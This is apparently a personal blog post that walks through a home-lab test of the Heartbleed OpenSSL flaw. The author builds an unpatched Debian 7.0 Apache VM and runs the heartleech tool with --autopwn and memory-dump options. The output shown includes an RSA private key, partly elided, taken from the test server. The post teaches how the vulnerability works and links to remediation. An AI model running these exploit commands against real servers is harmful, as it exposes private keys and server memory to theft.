No fresh news, but I had been wanting to test the Heartbleed vulnerability for a while and just missed time.
I used the following quick setup:
- Debian 7.0 virtual machine as a vulnerable host
- Heartleech tool. There are many other tools around, but this one was suggested to me by a coworker, who used it successfully during a pentest.
Getting a vulnerable host in your own environment is not that trivial, as most OS have now been patched (including the installation ISO of supported versions).
In my quest, I ended up with Debian 7.0 (Debian 6.x are too old and actually do not suffer from the vulnerability).
To download an old and unpatched installation image of Debian, you need to use Jigdo. This tool will download all packages from the archive site of Debian and rebuild the ISO:
jigdo-lite ftp://cdimage.debian.org/cdimage/archive/7.0.0/i386/jigdo-dvd/debian-7.0.0-i386-DVD-1.jigdo
Then, create a virtual machine with no network card, to make sure that the installation process does not retrieve any patch.
Once the Debian virtual machine is set and running:
- Edit <code>/etc/apt/source.list</code> to comment out lines concerning security updates (keep only the DVD enabled)
- Add and configure a network card (<code>eth0</code>)
- Install Apache2
- Enable SSL:
a2enmod ssl
- Enable the default SSL web pages: <code>e2ensite default-ssl</code>
- Open a browser to check that it all works at <code>https://hostname</code>
Using heartleech is incredibly fast and straightforward:
heartleech % ./heartleech 172.25.254.153 --autopwn --- heartleech/1.0.0i --- https://github.com/robertdavidgraham/heartleech 786648 bytes downloaded (6.293-mbps) -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA40dv2FdGVHxQRydIyZixnNwnez6bFMyQu+AAjpFmphA39Lzr 4rW8ca8uY0W34jeHx+qTNABkrmfOeZpTFbpCnU7ZDRy8J/KUoq6o26vdkg98fT/t VqlBPLEp6uD0bazvNp4H5KGO3f1c06y8uBjc4/hOPgiCYYi3aPQpV8ybHqkcdA4K ps6u9EYvXHwInUwXwOg13OynpYfsxJt2PSF/qoaz7zbU0ie7wMJFFFmXEMwT0uUX [...] ko+g0mrTttbz6egHRs3JFmV3oucnGCrTq/Z4Ivcsqdt059UhspDFxMPoesyUjMQs o8KZF5q2adNTxyoaQPiln9H9GjDSSKt448G9YM7CM7cAd7JkvFBdEjrRsP+4W92B 3EPn1yMCgYEA+LARBdzOfFasv4/UWub85QersrT35hNneTrtaVTBiJR0v7jdXnqe k0aoHJV/D73j2hW3mGaC9JsnUMfZ3AkoDhfojZzqp2jOlaFNWZr80NDERekJrRTT 3JVFVF33NAW3OWY97/52XRZzcGJTDx9fx8R3guS4tR5O/ETgdREPmAw= -----END RSA PRIVATE KEY-----
You can also dump the memory in a file:
./heartleech 172.25.254.153 --cert /tmp/debian --read /tmp/test
To further look for interesting content with strings
or any parsing tool (Yara?) of your choice.
It gives also an alternative method to retrieve the private key. First, download the public key from your browser to a file and apply it to the dump to look for the matching private key:
./heartleech 172.25.254.153 --cert /tmp/debian --read /tmp/test --- heartleech/1.0.0i --- https://github.com/robertdavidgraham/heartleech -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA40dv2FdGVHxQRydIyZixnNwnez6bFMyQu+AAjpFmphA39Lzr 4rW8ca8uY0W34jeHx+qTNABkrmfOeZpTFbpCnU7ZDRy8J/KUoq6o26vdkg98fT/t VqlBPLEp6uD0bazvNp4H5KGO3f1c06y8uBjc4/hOPgiCYYi3aPQpV8ybHqkcdA4K ps6u9EYvXHwInUwXwOg13OynpYfsxJt2PSF/qoaz7zbU0ie7wMJFFFmXEMwT0uUX [...] ko+g0mrTttbz6egHRs3JFmV3oucnGCrTq/Z4Ivcsqdt059UhspDFxMPoesyUjMQs o8KZF5q2adNTxyoaQPiln9H9GjDSSKt448G9YM7CM7cAd7JkvFBdEjrRsP+4W92B 3EPn1yMCgYEA+LARBdzOfFasv4/UWub85QersrT35hNneTrtaVTBiJR0v7jdXnqe k0aoHJV/D73j2hW3mGaC9JsnUMfZ3AkoDhfojZzqp2jOlaFNWZr80NDERekJrRTT 3JVFVF33NAW3OWY97/52XRZzcGJTDx9fx8R3guS4tR5O/ETgdREPmAw= -----END RSA PRIVATE KEY-----
Neat!
You may check this page to get information on vulnerable versions and remediation.